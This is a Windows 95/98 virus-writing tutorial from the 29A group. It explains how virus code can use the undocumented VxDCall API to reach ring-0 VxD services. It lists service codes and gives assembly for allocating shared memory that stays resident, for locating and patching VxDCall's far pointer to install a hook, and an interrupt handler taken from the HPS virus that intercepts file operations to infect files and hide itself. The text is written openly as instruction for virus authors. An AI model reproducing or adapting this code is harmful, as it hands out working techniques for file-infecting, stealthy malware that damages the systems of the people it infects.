The VxDCall backdoor
by GriYo / 29A


    2. "SUPERVISOR MODE" hacking
    3. The API VxDCall
    4. Win32 services exported by system VxD's
    5. KERNEL32.DLL and the interrupt 21h
    6. Interrupt 21h functions
    7. Allocating shared memory
    8. VxDCall hooking
    9. Last words


Windows95/98 uses two of the four protection levels supported by the i386 proccessor and its succesors:

We all know that user applications are potential targets for viruses. If you are going to write a PE file infector your code will be executed at 'user mode', under the strict control of the operating system. Can the execution escape from this privilege level?

2 - "SUPERVISOR MODE" hacking

When an infected program is executed the virus code receives control for the very first time. At this point we know that the virus is working under 'user mode', far away from the 'supervisor mode'. To reach ring-0 we have to use one of the below described methods:

3 - The API VxDCall

"... A VxD is really nothing more than a DLL that runs at the highest privilege level of the processor (ring 0). Since VxD's runs at ring 0, there's essentially nothing they can't do".

After I read this fragment in Matt Pietrek's book 'Windows95 System Programming Secrets' I thought that VxD's might contain exported services, as DLL's do. I knew that VxD's exported services to other VxD's but did they export services to Win32?. If that was the case these services could be very useful for virus programming, because they are similar to API's but is running at ring-0.

After reading more at this subject I learned the answer to the above question. Yes VxD's contains all kind of services that are exported to other VxD's and Win32. The problem was now how to communicate with the VxD's at ring-0 from ring-3, which the virus is at.

After a little more research, I found a API called DeviceIoControl. This API allows a application to send/receive information to/from a VxD file. I then did some testing and learned this wasn't the API I was looking for, as DeviceIoControl doesn't allow the application to use services exported by VxD's.

When I tried to find some information about how to call Win32 services inside VxD's, all I could find was a reference. It seems to me like some poor attempt to hide important information about the internals of the operating system.

The key to it all is a undocumented API, which lets us use a powerful interface between ring-3 and ring-0. This API is called VxDCall and is exported by KERNEL32.DLL, but wait! Dont browse KERNEL32 exported API names because its not there. In order to drop more shadows on this Microsoft coders decided to hide this API, exporting it only as ordinal, not as name.

If we look at KERNEL32.DLL, we'll find tons of calls to this API. In some cases KERNEL32 code is just a wrapper between applications and VxD services.

The following piece of code shows how to call the service _PageFree, exported by VMM.VXD to Win32:

		push 00000000h
		push dword ptr [allocated_addr]
		push 0001000Ah
		call dword ptr [a_VxDCall]
		jmp init_error

The first two instruction push the parameters needed by _PageFree into the stack. The 3rd instruction is part of the protocol used to call VxDCall. The low-word is an index that indentifies the service we want to call. The high-word indentifies the VxD containing that service. In this example the codification is:

		0001h = VMM.VXD
		000Ah = _PageFree

If we debug a call to KERNEL32 VirtualFree API we will find that the code just checks input parameters. Some lines ahead is a call to VMM _PageFree service, wich do the dirty work.

Now lets see some of the services exported to Win32 by system VxD's. Just by reading the name of the service you can imagine lots of ideas on how to use them in virus writing.

4 - Win32 services exported by system VxD's

Services exported by VMM.VXD:

00010000h	PageReserve
00010001h	PageCommit
00010002h	PageDecommit
00010003h	PagerRegister
00010004h	PagerQuery
00010005h	HeapAllocate
00010006h	ContextCreate
00010007h	ContextDestroy
00010008h	PageAttach
00010009h	PageFlush
0001000Ah	PageFree
0001000Bh	ContextSwitch
0001000Ch	HeapReAllocate
0001000Dh	PageModifyPermissions
0001000Eh	PageQuery
0001000Fh	GetCurrentContext
00010010h	HeapFree
00010011h	RegOpenKey
00010012h	RegCreateKey
00010013h	RegCloseKey
00010014h	RegDeleteKey
00010015h	RegSetValue
00010016h	RegDeleteValue
00010017h	RegQueryValue
00010018h	RegEnumKey
00010019h	RegEnumValue
0001001Ah	RegQueryValueEx
0001001Bh	RegSetValueEx
0001001Ch	RegFlushKey
0001001Dh       ???
0001001Eh	GetDemandPageInfo
0001001Fh	BlockOnID
00010020h	SignalID
00010021h	RegLoadKey
00010022h	RegUnloadKey
00010023h	RegSaveKey
00010024h	RegRemapPreDefKey
00010025h	PageChangePager
00010026h	RegQueryMultipleValues
00010027h	RegReplaceKey

Another VxD exporting services to Win32 is VWIN32.VXD. Some of this services are:

002A0000	GetVersion
002A0001	Stuff VWIN32 code pointers into caller-supplied buffer
002A0002	Get system time
002A0003	Stuff code pointers from KERNEL32 into VWIN32's data area
002A0004	Block on some semaphore
002A0005	Calls Signal_Semaphore_No_Switch on some semaphore
002A0006	Calls VMM Create_Semaphore, and stuff into global var
002A0007	Calls VMM Destroy_Semaphore on semaphore created by 002A0006
002A0008	VWIN32_CreateThread (including allocating TDBX)
002A0009	VWIN32_Sleep
002A000A	WakeThread
002A000B	TerminateThread
002A000C	Some sort of initialization function
002A000D	_VWIN32_QueueUserApc
002A000E	VWIN32_Initialize
002A000F	_VWIN32_QueueKernelApc
002A0010	VWIN32_Int21Dispatch
002A0011	Calls IFSMgr_Win32DupHandle
002A0012	VWIN32_BlockThreadSetBit
002A0013	Adjust_Thread_Exec_Priority
002A0014	_VWIN32_Get_Thread_Context
002A0015	_VWIN32_Set_Thread_Context
002A0016	Read process memory
002A0017	Write process memory
002A0018	Calls VMCPD_Get_CR0_State
002A0019	Calls VMCPD_Set_CR0_State
002A001A	SuspendThread
002A001B	ResumeThread
002A001C	???
002A001D	WaitCrst
002A001E	WakeCrst
002A001F	Something to do with loading/unloading VxD's
002A0020	WMCPD_Get_Version
002A0021	Set_Thread_Win32_Pri
002A0022	Calls Boost_With_Decay
002A0023	Calls Set_Inversion_Pri
002A0024	Calls Release_Inversion_Pri_ID
002A0025	Calls Release_Inversion_Pri
002A0026	Calls Attach_Thread_To_Group
002A0027	Calls Set_Thread_Static_Boost
002A0028	Calls Set_Group_Static_Boost
002A0029	VWIN32_Int31Dispatch
002A002A	VWIN32_Int41Dispatch
002A002B	VWIN32_BlockForTermination
002A002C	TerminationHandler2
002A002D	???
002A002E	dwBlockSingleWnod (WaitForSingleObject)
002A002F	dwBlockMultipleWnod (WaitForMultipleObjects)
002A0030	VWIN32_SetEvent
002A0031	Something to do with delivering APC's
002A0032	???
002A0033	InitUserAPCList
002A0034	???
002A0035	Calls VMM Signal_Semaphore_No_Switch
002A0036	Calls System_Control (KERNEL32_INITIALIZED)
002A0037	VWIN32_CommonFaultPopup
002A0038	VWIN32_ForceCrsts
002A0039	???
002A003A	VWIN32_FreezeAllThreads
002A003B	VWIN32_UnFreezeAllThreads
002A003C	Calls IFS_Mgr_Ring0_FileIO
002A003D	Calls Get_Initial_Thread_Handle, Attach_Thread_To_Group and
002A003E	VWIN32_ActivateTimeBiasSet
002A003F	ModifyPagePermission (used by VirtualQueryEx)
002A0040	Used by VirtualQueryEx
002A0041	ForceLeaveCrst
002A0042	ForceEnterCrst
002A0043	Calls VMCPD_Set_Thread_Excpt_Type
002A0044	VTD_Get_Real_Time
002A0045	Calls System_Control (SET_DEVICE_FOCUS)
002A0046	Calls VWIN32_UnFreezeThread
002A0047	Calls VMM_Replace_Global_Environment
002A0048	Calls System_Control (KERNEL32_SHUTDOWN)
002A0049	???
002A004A	VW32_AddSysCrst
002A004B	VW32_SetTimeOut
002A004C	VW32_Cancel_Time_Out
002A004D	???
002A004E	Something to do with setting and reflecting hotkeys


		Crst means Critical Section

                APC means Asynchronous Procedure Call

                VMCPD is the Virtual Math Coprocessor Device

                IFSMgr is the Installable File System Manager

                System_Control is the VMM.VXD ring 0 service that broadcasts
                system control messages to VxD's.

5 - KERNEL32.DLL and the interrupt 21h

Look close at VWIN32 exported services. There is one called VWIN32_Int21Dispatch. Its is a backdoor that allows Win32 to call the well known interrupt 21h. Now search the KERNEL32 code and look for calls to this service. Oh! There are hundreds! I though Microsoft said that Windows95 doesnt deppend on MsDos. Below is a example of how to call interrupt 21h using that service:

my_int21h:	push ecx
		push eax
		push 002A0010h
		call dword ptr [ebp+a_VxDCall]

I found the right way to call VWIN32_Int21hDispatch by looking at how KERNEL32 calls it. I learned that Windows uses interrupt 21h to perform tasks such as: find, open, read, write, close, delete or rename files. By hooking all these functions with VxDCall, we can effectively monitor file access.

6 - Interrupt 21h functions

This is a list of interrupt 21h functions for MS-DOS LFN (long file name) extension. KERNEL32 uses these functions continiuosly.

0E00		Set default drive
1900		Get current drive
2A00		Get system date
2B00		Set system date
2C00		Get system time
2D00		Set system time
3600		Get disk free space
3D00		Open existing file for read only
3D02		Open existing file for read/write
3E00		Close file
3F00		Read file
4000		Write file
4200		Set current file position relative to start of file
4201		Set current file position relative to current position
4202		Set current file position relative to end of file
4400		IOCTL get device information
4401		IOCTL set device information
4408		IOCTL check if block device is removable
4409		IOCTL check if block device remote
440D		IOCTL generic block device request
4B00		Exec program
4D00		Get return code
5000		Set current PSP
5700		Get file date/time
5701		Set file date/time
5704		Set extended file attributes
5900		Get extended error info
5C00		Lock file region
5C01		Unlock file region
5E00		Network functions
6800		Commit file
7139		LFN create directory
713A		LFN remove directory
713B		LFN change directory
7141		LFN delete file
7143		LFN get/set file attributes
7147		LFN get current directory
714E		LFN find first file
714F		LFN find next file
7156		LFN rename file
7160		LFN get canonical filename
716C		LFN extended open/create
71A0		LFN get volume information
71A1		LFN find close
71A6		LFN get file info by handle
71A7		LFN file time to DOS time

The following example shows how to use these functions. This code will be useful later in our virus.

;Move file pointer
;Entry:		ebx = File handle

seek_here:	;Move pointer to position specified in edx
		mov eax,edx
           	and eax,0FFFF0000h
		shr eax,10h
		mov ecx,eax
		mov eax,00004200h                
		jmp short seek_now

seek_bof:	;Move pointer to beginning of file
		mov eax,00004200h                       
		jmp short do_seek

seek_eof:	;Move pointer to end of file
		mov eax,00004202h
do_seek: 	xor edx,edx
		xor ecx,ecx
seek_now:	call my_int21h
		jc exit_seek
		and eax,0000FFFFh
		shl edx,10h
		or eax,edx
		xor edx,edx
exit_seek:	ret

7 - Allocating shared memory

We can use the functions exported by VMM.VXD in the same way we used with VWIN32.VXD. Lets have a look at the services used by VMM.VXD to handle 'page-based' memory in Windows95.


This services correspond with the ones in KERNEL32 APIs used for handling 'virtual memory'. In some cases that code at KERNEL32 just checks the entry parameters and call the corresponding service in VMM.VXD.

We now how to allocate 'virtual memory' in Win32:

VirtualAlloc ( 	LPVOID lpAddress,
		DWORD dwSize,
		DWORD flAllocationType,
		DWORD flProtect );

The VirtualAlloc function reserves or commits a region of pages in the virtual address space of the calling process. The entry parameters are:

		- lpAddress 	

                Specifies the desired starting address of the region to 
		allocate. If this parameter is NULL, the system determines 
		where to allocate the region. 

                - dwSize 		
		Specifies the size, in bytes, of the region. If the lpAddress
		parameter is NULL, this value is rounded up to the next page

                - flAllocationType 

                Specifies the type of allocation. You can specify any 
		combination of the following flags: 

                MEM_COMMIT - Allocates physical storage in memory or in the
		paging file on disk for the specified region of pages. An 
		attempt to commit an already committed page will not cause 
		the function to fail. This means that a range of committed 
		or decommitted pages can be committed without having to worry
		about a failure.

                MEM_RESERVE - Reserves a range of the process's virtual
		address space without allocating any physical storage. The 
		reserved range cannot be used by any other allocation 
		operations (the malloc function, the LocalAlloc function, and
		so on) until it is released. Reserved pages can be committed
		in subsequent calls to the VirtualAlloc function. 

                - flProtect 

                Specifies the type of access protection. If the pages are 
		being committed, any one of the following flags can be 
		specified, along with the PAGE_GUARD and PAGE_NOCACHE 
		protection modifier flags, as desired:


Lets trace a call to VirtualAlloc with the debugger. We will see how this API checks the entry parameters and then calls to the service _PageReserve in VMM.VXD, using VxDCall. During the execution of VirtualAlloc API the call will return with error in the folling cases:

		- If dwSize specifies too much space.
		- If lpAddress is an invalid address.
		- If the undocumented flag MEM_SHARED was included.
		- If the call to _PageReserve fails.

Although we know the existence of the flag MEM_SHARED, we cant use it due to the checks performed by VirtualAlloc. In order to allocate a region of pages into system shared memory we are going to bypass the calling protocol and go straigh to _PageReserve. Here is an example:

                push PC_WRITEABLE or PC_USER
                push page_mem_size                      ;Size
                push PR_SHARED
                push 00010000h                          ;Call to _PageReserve
                call dword ptr [ebp+a_VxDCall]          ;...using VxDCall
                cmp eax,0FFFFFFFFh                      ;Error?
                je init_error
                cmp eax,80000000h                       ;Into shared memory?
                jb free_pages
                mov dword ptr [ebp+mem_address],eax     ;Save region address
                push PC_WRITEABLE or PC_USER or PC_PRESENT or PC_FIXED
                push 00000000h
                push PD_ZEROINIT
                push page_mem_size                      ;Size
                shr eax,0Ch                             ;Page number
                push eax                                
                push 00010001h                          ;Call to _PageCommit
                call dword ptr [ebp+a_VxDCall]          ;...using VxDCall
                or eax,eax
                je free_pages

In the first call to VxDCall i used the service _PageReserve from VMM.VXD (0001h = VMM.VXD and 0000h = _PageReserve). As first entry parameter we specify the type of memory to allocate, using the following flags:

                PC_FIXED        Commit a region of locked memory. This
				pages will stay locked along all the session.

                PC_LOCKED       Commit a regin of locked memory that can
				be unlocked later.

                PC_WRITEABLE    Write access to the commited pages.

                PC_USER         This is a must if you want to access the
				allocated pages from ring-3.

After this the routines pushes into stack the number of bytes to allocate. The last parameter is the starting page for the allocated region, but you can also specify one of the following flags:

                PR_PRIVATE      Reserve memory in the ring-3 privated area
				for each application,

                PR_SHARED       Reserve memory in the ring-3 shared area.

                PR_SYSTEM       Reserve ring-0 memory.

By means of PR_SHARED flag our memory region will be allocated into shared memory, and this area will be visible for all applications. This is important if we plan to monitor all the calls suited by any application.

In case of error Page_Reserve will return 0FFFFFFFFh in eax register. If the memory was allocated without problems eax is a pointer to it. Then we can check if the pages was allocated at shared memory area, this is, above 80000000h.

Once the memory is allocated it's time to tell the operating system to map that memory into physical memory. For this purpose is _PageCommit, exported by VMM.

The first parameter are some flags similar to the ones used in the call to _PageReserve. This time we specify PC_PRESENT to keep the memory once the owner program terminates.

I use 0 as next parameter, i dont want to mess with 'PAGERS' and other details of the memory managment, this is out of the purpose of this article.

Then we use PD_ZEROINIT to initialize allocated memory with zero's. The last parameter specifies the number of pages to commit. In case of error the call will return 0, and the virus have to free previously allocated pages:

free_pages:	xor eax,eax
                push eax
                push dword ptr [ebp+mem_address]
                push 0001000Ah
                call dword ptr [ebp+a_VxDCall]

The work is done, now our virus can allocate a block of memory that will stay there after the application terminates. The virus can copy its body to this area and redirect some kernel functions to pass through our code before or after being executed.

8 - VxDCall hooking

Take the debugger and have a look at how the VxDCall function comunicates with VxD's. You will find something like this:

		mov eax,dword ptr [esp+00000004h]
		pop dword ptr [esp]
		call fword ptr cs:[BFFC9004]

This code loads eax with the identifier of the VxD containing the desired service. After a stack fix everything is ready for jumping to the service code. The call instruction will translate us to:

		int 30h

Nice... Seems like the system is using interrupt 30h to jump into ring-0. If you trace into the interrupt call you will fall somewhere inside VMM.VXD.

Now lets have a closer look at VxDCall code, soecially to the following instruction:

		call fword ptr cs:[BFFC9004]

This instruction will translate the execution to the address stored into cs:[BFFC9004]. This address points to the interrupt call. If we overwrite this value with a pointer to our own handler we succesfully hooked VxDCall.

		mov esi,dword ptr [ebp+a_VxDCall]       ;VxDCall address
		mov ecx,00000100h                       ;Explore 0100h bytes
trace_VxDCall:  lodsb
		cmp al,2Eh
		jne trace_next
		cmp word ptr [esi],1DFFh
		je get_int30h
trace_next:	loop trace_VxDCall                      

The code above follows the VxDCall API code looking for the following sequence of byte:

		2E FF 1D xx xx xx xx  CALL FWORD PTR CS:[xxxxxxxx]

When the virus finds the call instruction it can extract the value there, save it inside virus code and patch it to point to the viral handler.

		lodsw                                   ;Skip FF 1D opcodes
		lodsd                                   ;Get ptr to INT 30h
		push eax
		mov esi,eax
		mov edi,dword ptr [ebp+mem_address]
		add edi,VxDCall_code-mem_base
		mov ecx,00000006h
		rep movsb
		pop edi                                 
		mov eax,dword ptr [ebp+mem_address]
		add eax,VxDCall_hook-mem_base
		mov ax,cs                               ;Overwrite far ptr

We stop interrupts before proceeding. Then take the address of xxxxxxxx and we find a 'FWORD' that point to the int 30h instruction. 'FWORD' are six bytes, the virus have to copy this bytes into a save buffer inside its body.

Finally we write the address of our handler, first the 32bits offset and the segment next (remember that 'FWORD' is a 16:32 value). Turn on interrupts, now the hook is active.

Below is a portion of the HPS virus, the interrupt handler:

VxDCall_hook:   pushad

                call mem_delta                          ;Get "in-memory"
mem_delta:      pop ebp                                 ;delta offset
                sub ebp,offset mem_delta

                cmp dword ptr [ebp+hook_status],"BUSY"  ;Dont process our
                je exit_hook                            ;own calls

                cmp eax,002A0010h                       ;VWIN32 VxD int 21h?
                jne exit_hook

                mov eax,dword ptr [esp+0000002Ch]
                cmp ax,2A00h                            ;Get system time?
                je tsr_check

                cmp ax,3D00h                            ;Open file read?
                je infection_edx

                cmp ax,3D01h                            ;Open file
                je infection_edx                        ;read/write?
                cmp ax,7143h                            ;X-Get/set attrib?
                je infection_edx

                cmp ax,714Eh                            ;LFN find first file
                je stealth

                cmp ax,714Fh                            ;LFN find next file
                je stealth

                cmp ax,7156h                            ;LFN rename file?
                je infection_edx

                cmp ax,716Ch                            ;LFN extended open?
                je infection_esi

                cmp ax,71A8h                            ;Generate short name?
                je infection_esi

exit_hook:      popad

do_far_jmp:     ;Do a jmp fword ptr cs:[xxxxxxxx] into original code

                db 2Eh,0FFh,2Dh
ptr_location    dd 00000000h

Some readers will notice that the virus sets a global variable at the beginning of the handler code. This variable works as semaphore and it's purpose is to avoid the virus from proccesing its own calls to VxDCall.

Next, the virus checks if the requested service is VWIN32_Int21Dispatch. If so the function number specified by the caller is read from the stack. The virus looks for interesting functions and perform the corresponding tasks.

Finally the execution is passed to the original VxDCall function, which address we saved before.

9 - Last words

This is just another backdoor in Windows95 security, that is also present under Windows98. I wrote the HPS virus to show how to exploit this.

HPS shows how to trick VxDCall to infect files and perform its stealth routine. The virus also uses VxDCall to 'bypass' KERNEL32 memory managment, fooling all checks.